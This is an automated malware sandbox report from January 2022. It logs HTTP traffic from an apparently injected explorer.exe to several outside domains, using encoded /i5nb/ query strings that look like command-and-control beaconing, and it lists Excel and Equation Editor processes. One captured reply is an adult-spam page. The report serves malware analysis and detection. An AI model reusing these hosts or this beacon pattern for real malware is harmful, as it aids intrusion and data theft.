
                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  4192.168.2.2249171216.172.160.18880C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 13, 2022 20:23:06.112768888 CET498OUTGET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1
                                                  Host: www.terapiaholisticaemformacao.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:23:06.319093943 CET499INHTTP/1.1 404 Not Found
                                                  Date: Thu, 13 Jan 2022 19:23:06 GMT
                                                  Server: Apache
                                                  Upgrade: h2,h2c
                                                  Connection: Upgrade, close
                                                  Last-Modified: Fri, 26 Jul 2019 13:18:26 GMT
                                                  Accept-Ranges: bytes
                                                  Content-Length: 2361
                                                  Vary: Accept-Encoding
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 39 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 39 32 78 31 39 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 30 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 3e
                                                  Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x192"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120">


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  5192.168.2.2249172192.185.98.25180C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 13, 2022 20:23:11.619415045 CET501OUTGET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1
                                                  Host: www.ecommerceoptimise.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:23:11.771730900 CET503INHTTP/1.1 404 Not Found
                                                  Date: Thu, 13 Jan 2022 19:23:11 GMT
                                                  Server: Apache
                                                  Upgrade: h2,h2c
                                                  Connection: Upgrade, close
                                                  Last-Modified: Fri, 14 Feb 2020 00:55:46 GMT
                                                  Accept-Ranges: bytes
                                                  Content-Length: 11816
                                                  Vary: Accept-Encoding
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 67 61 74 6f 72 62 6f 74 74 6f 6d 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6c 65 66 74 3a 33 39 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 78 78 78 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 3a 34 30 70 78 20 33 39 37 70 78 20 31 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 20 61 75 74
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>404 - PAGE NOT FOUND</title>... Add Slide Outs --><script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> <script src="/cgi-sys/js/simple-expand.min.js"></script> <style type="text/css"> body{padding:0;margin:0;font-family:helvetica;} #container{margin:20px auto;width:868px;} #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;} #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;} #container #mid404 #gatorbottom{position:relative;left:39px;float:left;} #container #mid404 #xxx{float:left;padding:40px 397px 10px; margin: auto aut


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  6192.168.2.2249174221.121.143.14880C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 13, 2022 20:23:17.360008955 CET515OUTGET /i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr HTTP/1.1
                                                  Host: www.integratedheartspsychology.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:23:17.639343023 CET516INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Thu, 13 Jan 2022 19:23:17 GMT
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name chang


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  7192.168.2.224917523.80.120.9380C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Jan 13, 2022 20:23:23.008996964 CET517OUTGET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1
                                                  Host: www.bjbwx114.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jan 13, 2022 20:23:23.537935019 CET519INHTTP/1.1 200 OK
                                                  Date: Thu, 13 Jan 2022 19:23:13 GMT
                                                  Content-Length: 1795
                                                  Content-Type: text/html
                                                  Server: nginx
                                                  Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 c1 d9 e2 a2 d0 cb ce bb bf c6 bc bc d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 30 31 32 37 3b 26 23 32 39 33 37 38 3b 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 35 37 30 3b 26 23 32 39 32 33 32 3b 26 23 32 30 38 34 30 3b 26 23 33 36 38 30 37 3b 26 23 33 31 32 34 33 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 36 35 3b 26 23 38 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 31 35 36 30 3b 26 23 33 30 35 32 38 3b 26 23 32 32 39 30 32 3b 26 23 32 37 37 30 30 3b 26 23 32 30 35 37 30 3b 26 23 33 30 35 32 38 3b 26 23 32 39 32 33 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 30 31 32 37 3b 26 23 32 39 33 37 38 3b 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 38 38 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 35 37 30 3b 26 23 32 39 32 33 32 3b 26 23 32 30 38 34 30 3b 26 23 33 36 38 30 37 3b 26 23 33 31 32 34 33 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 36 35 3b 26 23 38 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 31 35 36 30 3b 26 23 33 30 35 32 38 3b 26 23 32 32 39 30 32 3b 26 23 32 37 37 30 30 3b 26 23 32 30 35 37 30 3b 26 23 33 30 35 32 38 3b 26 23 32 39 32 33 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 35 37 30 3b 26 23 32 39 32 33 32 3b 26 23 32 30 38 34 30 3b 26 23 33 36 38 30 37 3b 26 23 33 31 32 34 33 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 36 35 3b 26 23 38 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 31 35 36 30 3b 26 23 33 30 35 32 38 3b 26 23 32 32 39 30 32 3b 26 23 32 37 37 30 30 3b 26 23 32 30 35 37 30 3b 26 23 33 30 35 32 38 3b 26 23 32 39 32 33 33 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 30 31 32 37
                                                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#26085;&#26412;&#30127;&#29378;&#39640;&#28526;&#88;&#88;&#88;&#88;&#35270;&#39057;,&#20570;&#29232;&#20840;&#36807;&#31243;&#20813;&#36153;&#26080;&#30721;&#30340;&#35270;&#39057;,&#65;&#86;&#26080;&#30721;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#21560;&#30528;&#22902;&#27700;&#20570;&#30528;&#29233;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;</title><meta name="keywords" content="&#26085;&#26412;&#30127;&#29378;&#39640;&#28526;&#88;&#88;&#88;&#88;&#35270;&#39057;,&#20570;&#29232;&#20840;&#36807;&#31243;&#20813;&#36153;&#26080;&#30721;&#30340;&#35270;&#39057;,&#65;&#86;&#26080;&#30721;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#21560;&#30528;&#22902;&#27700;&#20570;&#30528;&#29233;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;" /><meta name="description" content="&#20570;&#29232;&#20840;&#36807;&#31243;&#20813;&#36153;&#26080;&#30721;&#30340;&#35270;&#39057;,&#65;&#86;&#26080;&#30721;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#21560;&#30528;&#22902;&#27700;&#20570;&#30528;&#29233;&#35270;&#39057;&#22312;&#32447;&#35266;&#30475;,&#26085;&#26412;&#30127


                                                  Code Manipulations

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  Analysis Process: EXCEL.EXE PID: 2032 Parent PID: 596

                                                  General

                                                  Start time:20:21:22
                                                  Start date:13/01/2022
                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                  Imagebase:0x13ffd0000
                                                  File size:28253536 bytes
                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Analysis Process: EQNEDT32.EXE PID: 2016 Parent PID: 596

                                                  General

                                                  Start time:20:21:46
                                                  Start date:13/01/2022
